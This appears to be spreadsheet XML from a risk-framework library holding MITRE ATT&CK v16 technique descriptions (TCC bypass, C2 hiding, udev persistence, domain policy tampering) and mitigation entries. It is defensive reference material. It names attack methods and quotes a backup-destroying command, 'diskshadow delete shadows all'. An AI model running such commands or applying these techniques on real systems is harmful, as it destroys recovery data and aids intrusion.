When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
https://attack.mitre.org/techniques/T1548/006</t>
  </si>
  <si>
    <t>T1055.008</t>
  </si>
  <si>
    <t>Ptrace System Calls</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055/008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1653</t>
  </si>
  <si>
    <t>T1027.007</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1027/007</t>
  </si>
  <si>
    <t>T1021.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1021/001</t>
  </si>
  <si>
    <t>T1037.001</t>
  </si>
  <si>
    <t>Logon Script (Windows)</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1037/001</t>
  </si>
  <si>
    <t>T1055.015</t>
  </si>
  <si>
    <t>ListPlanting</t>
  </si>
  <si>
    <t>Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process.(Citation: Hexacorn Listplanting)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
https://attack.mitre.org/techniques/T1055/015</t>
  </si>
  <si>
    <t>T1665</t>
  </si>
  <si>
    <t>Hide Infrastructure</t>
  </si>
  <si>
    <t>Adversaries may manipulate network traffic in order to hide and evade detection of their C2 infrastructure. This can be accomplished in various ways including by identifying and filtering traffic from defensive tools,(Citation: TA571) masking malicious domains to obfuscate the true destination from both automated scanning tools and security researchers,(Citation: Schema-abuse)(Citation: Facad1ng)(Citation: Browser-updates) and otherwise hiding malicious artifacts to delay discovery and prolong the effectiveness of adversary infrastructure that could otherwise be identified, blocked, or taken down entirely.
C2 networks may include the use of [Proxy](https://attack.mitre.org/techniques/T1090) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections. For example, an adversary may use a virtual private cloud to spoof their IP address to closer align with a victim's IP address ranges. This may also bypass security measures relying on geolocation of the source IP address.(Citation: sysdig)(Citation: Orange Residential Proxies)
Adversaries may also attempt to filter network traffic in order to evade defensive tools in numerous ways, including blocking/redirecting common incident responder or security appliance user agents.(Citation: mod_rewrite)(Citation: SocGholish-update) Filtering traffic based on IP and geo-fencing may also avoid automated sandboxing or researcher activity (i.e., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)).(Citation: TA571)(Citation: mod_rewrite)
Hiding C2 infrastructure may also be supported by [Resource Development](https://attack.mitre.org/tactics/TA0042) activities such as [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) and [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584). For example, using widely trusted hosting services or domains such as prominent URL shortening providers or marketing services for C2 networks may enable adversaries to present benign content that later redirects victims to malicious web pages or infrastructure once specific conditions are met.(Citation: StarBlizzard)(Citation: QR-cofense)
https://attack.mitre.org/techniques/T1665</t>
  </si>
  <si>
    <t>T1484</t>
  </si>
  <si>
    <t>Domain or Tenant Policy Modification</t>
  </si>
  <si>
    <t>Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. Such services provide a centralized means of managing identity resources such as devices and accounts, and often include configuration settings that may apply between domains or tenants such as trust relationships, identity syncing, or identity federation.
Modifications to domain or tenant settings may include altering domain Group Policy Objects (GPOs) in Microsoft Active Directory (AD) or changing trust settings for domains, including federation trusts relationships between domains or tenants.
With sufficient permissions, adversaries can modify domain or tenant policy settings. Since configuration settings for these services apply to a large number of identity resources, there are a great number of potential attacks malicious outcomes that can stem from this abuse. Examples of such abuse include:  
* modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)
* modifying domain trusts to include an adversary-controlled domain, allowing adversaries to  forge access tokens that will subsequently be accepted by victim domain resources(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)
* changing configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).
* adding new, adversary-controlled federated identity providers to identity tenants, allowing adversaries to authenticate as any user managed by the victim tenant (Citation: Okta Cross-Tenant Impersonation 2023)
Adversaries may temporarily modify domain or tenant policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.
https://attack.mitre.org/techniques/T1484</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1220</t>
  </si>
  <si>
    <t>T1596.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1596/005</t>
  </si>
  <si>
    <t>T1564.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1564/001</t>
  </si>
  <si>
    <t>T1578.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1578/001</t>
  </si>
  <si>
    <t>T1591.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1591/001</t>
  </si>
  <si>
    <t>T1137.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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such as: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
https://attack.mitre.org/techniques/T1137/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1587</t>
  </si>
  <si>
    <t>T1003.003</t>
  </si>
  <si>
    <t>NTDS</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1003/003</t>
  </si>
  <si>
    <t>T1602.001</t>
  </si>
  <si>
    <t>SNMP (MIB Dump)</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1602/001</t>
  </si>
  <si>
    <t>T1001.002</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1001/002</t>
  </si>
  <si>
    <t>T1204.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1204/001</t>
  </si>
  <si>
    <t>T1550.001</t>
  </si>
  <si>
    <t>Application Access Token</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</si>
  <si>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
https://attack.mitre.org/techniques/T1550/001</t>
  </si>
  <si>
    <t>T1547.008</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1547/008</t>
  </si>
  <si>
    <t>T1569.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1569/002</t>
  </si>
  <si>
    <t>T1078.004</t>
  </si>
  <si>
    <t>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alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or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or synced accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments - for example, by leveraging shared credentials to log onto [Remote Services](https://attack.mitre.org/techniques/T1021). High privileged cloud accounts, whether federated, synced, or cloud-only, may also allow pivoting to on-premises environments by leveraging SaaS-based [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) to run commands on hybrid-joined devices.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https://attack.mitre.org/techniques/T1078/004</t>
  </si>
  <si>
    <t>T1480.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1480/001</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.
https://attack.mitre.org/techniques/T1008</t>
  </si>
  <si>
    <t>T1564.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1564/004</t>
  </si>
  <si>
    <t>T1558.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1558/003</t>
  </si>
  <si>
    <t>T1003.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1003/006</t>
  </si>
  <si>
    <t>T1124</t>
  </si>
  <si>
    <t>System Time Discovery</t>
  </si>
  <si>
    <t>An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by services, such as the Windows Time Service on Windows or &lt;code&gt;systemsetup&lt;/code&gt; on macOS.(Citation: MSDN System Time)(Citation: Technet Windows Time Service)(Citation: systemsetup mac time) These time settings may also be synchronized between systems and services in an enterprise network, typically accomplished with a network time server within a domain.(Citation: Mac Time Sync)(Citation: linux system time)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In addition, adversaries can discover device uptime through functions such as &lt;code&gt;GetTickCount()&lt;/code&gt; to determine how long it has been since the system booted up.(Citation: Virtualization/Sandbox Evasion)
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd)
In addition, system calls – such as &lt;code&gt;time()&lt;/code&gt; – have been used to collect the current time on Linux devices.(Citation: MAGNET GOBLIN) On macOS systems, adversaries may use commands such as &lt;code&gt;systemsetup -gettimezone&lt;/code&gt; or &lt;code&gt;timeIntervalSinceNow&lt;/code&gt; to gather current time zone information or current date and time.(Citation: System Information Discovery Technique)(Citation: ESET DazzleSpy Jan 2022)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
https://attack.mitre.org/techniques/T1124</t>
  </si>
  <si>
    <t>T1053.002</t>
  </si>
  <si>
    <t>At</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</si>
  <si>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In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)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
https://attack.mitre.org/techniques/T1053/002</t>
  </si>
  <si>
    <t>T1055.001</t>
  </si>
  <si>
    <t>Dynamic-link Library Injection</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055/001</t>
  </si>
  <si>
    <t>T1588.005</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</si>
  <si>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https://attack.mitre.org/techniques/T1588/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1556</t>
  </si>
  <si>
    <t>T1546.017</t>
  </si>
  <si>
    <t>Udev Rules</t>
  </si>
  <si>
    <t>Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
https://attack.mitre.org/techniques/T1546/017</t>
  </si>
  <si>
    <t>T1056.004</t>
  </si>
  <si>
    <t>Credential API Hooking</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1056/004</t>
  </si>
  <si>
    <t>T1495</t>
  </si>
  <si>
    <t>Firmware Corruption</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1495</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</si>
  <si>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</si>
  <si>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</si>
  <si>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 &lt;code&gt;diskshadow.exe&lt;/code&gt; can be used to delete all volume shadow copies on a system - &lt;code&gt;diskshadow delete shadows all&lt;/code&gt; (Citation: Diskshadow) (Citation: Crytox Ransomware)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database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
https://attack.mitre.org/techniques/T1490</t>
  </si>
  <si>
    <t>T1546.007</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1546/007</t>
  </si>
  <si>
    <t>T1566.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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Lookout Dark Caracal Jan 2018)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
https://attack.mitre.org/techniques/T1566/003</t>
  </si>
  <si>
    <t>T1090.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1090/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1216</t>
  </si>
  <si>
    <t>T1102.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1102/001</t>
  </si>
  <si>
    <t>T1001.001</t>
  </si>
  <si>
    <t>Junk Data</t>
  </si>
  <si>
    <t>Adversaries may add junk data to protocols used for command and control to make detection more difficult.(Citation: FireEye SUNBURST Backdoor December 2020)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https://attack.mitre.org/techniques/T1001/001</t>
  </si>
  <si>
    <t>T1598.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1598/001</t>
  </si>
  <si>
    <t>T1552.007</t>
  </si>
  <si>
    <t>Container API</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1552/007</t>
  </si>
  <si>
    <t>T1584.001</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</si>
  <si>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taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: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
https://attack.mitre.org/techniques/T1584/001</t>
  </si>
  <si>
    <t>T1505.001</t>
  </si>
  <si>
    <t>SQL Stored Procedures</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1505/001</t>
  </si>
  <si>
    <t>T1556.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1556/004</t>
  </si>
  <si>
    <t>T1561.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1561/001</t>
  </si>
  <si>
    <t>T1213.005</t>
  </si>
  <si>
    <t>Messaging Applications</t>
  </si>
  <si>
    <t>Adversaries may leverage chat and messaging applications, such as Microsoft Teams, Google Chat, and Slack, to mine valuable information.  
The following is a brief list of example information that may hold potential value to an adversary and may also be found on messaging applications: 
* Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008)) 
* Source code snippets 
* Links to network shares and other internal resources 
* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)
* Discussions about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker 2021)(Citation: Microsoft DEV-0537)
In addition to exfiltrating data from messaging applications, adversaries may leverage data from chat messages in order to improve their targeting - for example, by learning more about an environment or evading ongoing incident response efforts.(Citation: Sentinel Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)
https://attack.mitre.org/techniques/T1213/005</t>
  </si>
  <si>
    <t>T1048.003</t>
  </si>
  <si>
    <t>Exfiltration Over Unencrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1048/003</t>
  </si>
  <si>
    <t>T1574.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1574/004</t>
  </si>
  <si>
    <t>T1601.002</t>
  </si>
  <si>
    <t>Downgrade System Image</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1601/002</t>
  </si>
  <si>
    <t>T1078.003</t>
  </si>
  <si>
    <t>Local Accounts</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1078/003</t>
  </si>
  <si>
    <t>T1211</t>
  </si>
  <si>
    <t>Exploitation for Defense Evasion</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</si>
  <si>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
https://attack.mitre.org/techniques/T1211</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1127</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1529</t>
  </si>
  <si>
    <t>T1218.014</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1218/014</t>
  </si>
  <si>
    <t>T1564.010</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1564/010</t>
  </si>
  <si>
    <t>T1574.012</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1574/012</t>
  </si>
  <si>
    <t>reference_controls</t>
  </si>
  <si>
    <t>urn:intuitem:risk:function:mitre-attack</t>
  </si>
  <si>
    <t>csf_function</t>
  </si>
  <si>
    <t>category</t>
  </si>
  <si>
    <t>M1031</t>
  </si>
  <si>
    <t>Network Intrusion Prevention</t>
  </si>
  <si>
    <t>detect</t>
  </si>
  <si>
    <t>technical</t>
  </si>
  <si>
    <t>Use intrusion detection signatures to block traffic at network boundaries.
https://attack.mitre.org/mitigations/M1031</t>
  </si>
  <si>
    <t>M1016</t>
  </si>
  <si>
    <t>Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.
https://attack.mitre.org/mitigations/M1016</t>
  </si>
  <si>
    <t>M1035</t>
  </si>
  <si>
    <t>Limit Access to Resource Over Network</t>
  </si>
  <si>
    <t>protect</t>
  </si>
  <si>
    <t>Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.
https://attack.mitre.org/mitigations/M1035</t>
  </si>
  <si>
    <t>M1029</t>
  </si>
  <si>
    <t>Remote Data Storage</t>
  </si>
  <si>
    <t>Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.
https://attack.mitre.org/mitigations/M1029</t>
  </si>
  <si>
    <t>M1037</t>
  </si>
  <si>
    <t>Filter Network Traffic</t>
  </si>
  <si>
    <t>Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
https://attack.mitre.org/mitigations/M1037</t>
  </si>
  <si>
    <t>M1021</t>
  </si>
  <si>
    <t>Restrict Web-Based Content</t>
  </si>
  <si>
    <t>Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.
https://attack.mitre.org/mitigations/M1021</t>
  </si>
  <si>
    <t>M1033</t>
  </si>
  <si>
    <t>Limit Software Installation</t>
  </si>
  <si>
    <t>Block users or groups from installing unapproved software.
https://attack.mitre.org/mitigations/M1033</t>
  </si>
  <si>
    <t>M1013</t>
  </si>
  <si>
    <t>Application Developer Guidance</t>
  </si>
  <si>
    <t>govern</t>
  </si>
  <si>
    <t>This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.
https://attack.mitre.org/mitigations/M1013</t>
  </si>
  <si>
    <t>M1034</t>
  </si>
  <si>
    <t>Limit Hardware Installation</t>
  </si>
  <si>
    <t>Block users or groups from installing or using unapproved hardware on systems, including USB devices.
https://attack.mitre.org/mitigations/M1034</t>
  </si>
  <si>
    <t>M1017</t>
  </si>
  <si>
    <t>User Training</t>
  </si>
  <si>
    <t>Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
https://attack.mitre.org/mitigations/M1017</t>
  </si>
  <si>
    <t>M1052</t>
  </si>
  <si>
    <t>User Account Control</t>
  </si>
  <si>
    <t>Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.
https://attack.mitre.org/mitigations/M1052</t>
  </si>
  <si>
    <t>M1028</t>
  </si>
  <si>
    <t>Operating System Configuration</t>
  </si>
  <si>
    <t>Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
https://attack.mitre.org/mitigations/M1028</t>
  </si>
  <si>
    <t>M1053</t>
  </si>
  <si>
    <t>Data Backup</t>
  </si>
  <si>
    <t>recover</t>
  </si>
  <si>
    <t>Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.
https://attack.mitre.org/mitigations/M1053</t>
  </si>
  <si>
    <t>M1038</t>
  </si>
  <si>
    <t>Execution Prevention</t>
  </si>
  <si>
    <t>Block execution of code on a system through application control, and/or script blocking.
https://attack.mitre.org/mitigations/M1038</t>
  </si>
  <si>
    <t>M1043</t>
  </si>
  <si>
    <t>Credential Access Protection</t>
  </si>
  <si>
    <t>Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.
https://attack.mitre.org/mitigations/M1043</t>
  </si>
  <si>
    <t>M1045</t>
  </si>
  <si>
    <t>Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.
https://attack.mitre.org/mitigations/M1045</t>
  </si>
  <si>
    <t>M1039</t>
  </si>
  <si>
    <t>Environment Variable Permissions</t>
  </si>
  <si>
    <t>Prevent modification of environment variables by unauthorized users and groups.
https://attack.mitre.org/mitigations/M1039</t>
  </si>
  <si>
    <t>M1057</t>
  </si>
  <si>
    <t>Data Loss Prevention</t>
  </si>
  <si>
    <t>Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)
https://attack.mitre.org/mitigations/M1057</t>
  </si>
  <si>
    <t>M1025</t>
  </si>
  <si>
    <t>Privileged Process Integrity</t>
  </si>
  <si>
    <t>Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.
https://attack.mitre.org/mitigations/M1025</t>
  </si>
  <si>
    <t>M1055</t>
  </si>
  <si>
    <t>Do Not Mitigate</t>
  </si>
  <si>
    <t>This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended.
https://attack.mitre.org/mitigations/M1055</t>
  </si>
  <si>
    <t>M1056</t>
  </si>
  <si>
    <t>Pre-compromise</t>
  </si>
  <si>
    <t>This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.
https://attack.mitre.org/mitigations/M1056</t>
  </si>
  <si>
    <t>M1020</t>
  </si>
  <si>
    <t>SSL/TLS Inspection</t>
  </si>
  <si>
    <t>Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.
https://attack.mitre.org/mitigations/M1020</t>
  </si>
  <si>
    <t>M1046</t>
  </si>
  <si>
    <t>Boot Integrity</t>
  </si>
  <si>
    <t>Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.
https://attack.mitre.org/mitigations/M1046</t>
  </si>
  <si>
    <t>M1060</t>
  </si>
  <si>
    <t>Out-of-Band Communications Channel</t>
  </si>
  <si>
    <t>Establish secure out-of-band communication channels to ensure the continuity of critical communications during security incidents, data integrity attacks, or in-network communication failures. Out-of-band communication refers to using an alternative, separate communication path that is not dependent on the potentially compromised primary network infrastructure. This method can include secure messaging apps, encrypted phone lines, satellite communications, or dedicated emergency communication systems. Leveraging these alternative channels reduces the risk of adversaries intercepting, disrupting, or tampering with sensitive communications and helps coordinate an effective incident response.(Citation: TrustedSec OOB Communications)(Citation: NIST Special Publication 800-53 Revision 5)
https://attack.mitre.org/mitigations/M1060</t>
  </si>
  <si>
    <t>M1030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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/mitigations/M1030</t>
  </si>
  <si>
    <t>M1019</t>
  </si>
  <si>
    <t>Threat Intelligence Program</t>
  </si>
  <si>
    <t>A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.
https://attack.mitre.org/mitigations/M1019</t>
  </si>
  <si>
    <t>M1027</t>
  </si>
  <si>
    <t>Password Policies</t>
  </si>
  <si>
    <t>Set and enforce secure password policies for accounts.
https://attack.mitre.org/mitigations/M1027</t>
  </si>
  <si>
    <t>M1040</t>
  </si>
  <si>
    <t>Behavior Prevention on Endpoint</t>
  </si>
  <si>
    <t>Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
https://attack.mitre.org/mitigations/M1040</t>
  </si>
  <si>
    <t>M1018</t>
  </si>
  <si>
    <t>User Account Management</t>
  </si>
  <si>
    <t>Manage the creation, modification, use, and permissions associated to user accounts.
https://attack.mitre.org/mitigations/M1018</t>
  </si>
  <si>
    <t>M1022</t>
  </si>
  <si>
    <t>Restrict File and Directory Permissions</t>
  </si>
  <si>
    <t>Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
https://attack.mitre.org/mitigations/M1022</t>
  </si>
  <si>
    <t>M1026</t>
  </si>
  <si>
    <t>Privileged Account Management</t>
  </si>
  <si>
    <t>Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
https://attack.mitre.org/mitigations/M1026</t>
  </si>
  <si>
    <t>M1024</t>
  </si>
  <si>
    <t>Restrict Registry Permissions</t>
  </si>
  <si>
    <t>Restrict the ability to modify certain hives or keys in the Windows Registry.
https://attack.mitre.org/mitigations/M1024</t>
  </si>
  <si>
    <t>M1049</t>
  </si>
  <si>
    <t>Antivirus/Antimalware</t>
  </si>
  <si>
    <t>Use signatures or heuristics to detect malicious software.
https://attack.mitre.org/mitigations/M1049</t>
  </si>
  <si>
    <t>M1032</t>
  </si>
  <si>
    <t>Multi-factor Authentication</t>
  </si>
  <si>
    <t>Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
https://attack.mitre.org/mitigations/M1032</t>
  </si>
  <si>
    <t>M1054</t>
  </si>
  <si>
    <t>Software Configuration</t>
  </si>
  <si>
    <t>Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
https://attack.mitre.org/mitigations/M1054</t>
  </si>
  <si>
    <t>M1048</t>
  </si>
  <si>
    <t>Application Isolation and Sandboxing</t>
  </si>
  <si>
    <t>Restrict execution of code to a virtual environment on or in transit to an endpoint system.
https://attack.mitre.org/mitigations/M1048</t>
  </si>
  <si>
    <t>M1047</t>
  </si>
  <si>
    <t>Audit</t>
  </si>
  <si>
    <t>Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
https://attack.mitre.org/mitigations/M1047</t>
  </si>
  <si>
    <t>M1050</t>
  </si>
  <si>
    <t>Exploit Protection</t>
  </si>
  <si>
    <t>Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.
https://attack.mitre.org/mitigations/M1050</t>
  </si>
  <si>
    <t>M1015</t>
  </si>
  <si>
    <t>Active Directory Configuration</t>
  </si>
  <si>
    <t>Implement robust Active Directory configurations using group policies to control access and reduce the attack surface. Specific examples include:
* Account Configuration: Use provisioned domain accounts rather than local accounts to leverage centralized control and auditing capabilities.
* Interactive Logon Restrictions: Enforce group policies that prohibit interactive logons for accounts that should not directly access systems.
* Remote Desktop Settings: Limit Remote Desktop logons to authorized accounts to prevent misuse by adversaries.
* Dedicated Administrative Accounts: Create specialized domain-wide accounts that are restricted from interactive logons but can perform specific tasks like installations or repository access.
* Authentication Silos: Configure Authentication Silos in Active Directory to create access zones with restrictions based on membership in the Protected Users global security group. This setup enhances security by applying additional protections to high-risk accounts, limiting their exposure to potential attacks.
https://attack.mitre.org/mitigations/M1015</t>
  </si>
  <si>
    <t>M1051</t>
  </si>
  <si>
    <t>Update Software</t>
  </si>
  <si>
    <t>Perform regular software updates to mitigate exploitation risk.
https://attack.mitre.org/mitigations/M1051</t>
  </si>
  <si>
    <t>M1044</t>
  </si>
  <si>
    <t>Restrict Library Loading</t>
  </si>
  <si>
    <t>Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.
https://attack.mitre.org/mitigations/M1044</t>
  </si>
  <si>
    <t>M1042</t>
  </si>
  <si>
    <t>Disable or Remove Feature or Program</t>
  </si>
  <si>
    <t>Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
https://attack.mitre.org/mitigations/M1042</t>
  </si>
  <si>
    <t>M1036</t>
  </si>
  <si>
    <t>Account Use Policies</t>
  </si>
  <si>
    <t>Configure features related to account use like login attempt lockouts, specific login times, etc.
https://attack.mitre.org/mitigations/M1036</t>
  </si>
  <si>
    <t>M1041</t>
  </si>
  <si>
    <t>Encrypt Sensitive Information</t>
  </si>
  <si>
    <t>Protect sensitive information with strong encryption.
https://attack.mitre.org/mitigations/M1041</t>
  </si>
  <si>
    <t>name[fr]</t>
  </si>
  <si>
    <t>description[fr]</t>
  </si>
  <si>
    <t>copyright[fr]</t>
  </si>
  <si>
    <t>Mitre ATT&amp;CK v16 - Menaces et mesures d’atténuation</t>
  </si>
  <si>
    <t>Conditions d’utilisation
LICENCE
MITRE Corporation (MITRE) vous accorde par la présente une licence non exclusive et libre de droits pour utiliser ATT&amp;CK® à des fins de recherche, de développement et commerciales. Toute copie que vous faites à ces fins est autorisée à condition que vous reproduisiez la désignation de droit d’auteur de MITRE et la présente licence dans une telle copie.
" © 2022 La société MITRE. Cette œuvre est reproduite et distribuée avec la permission de The MITRE Corporation.
AVERTISSEMENTS
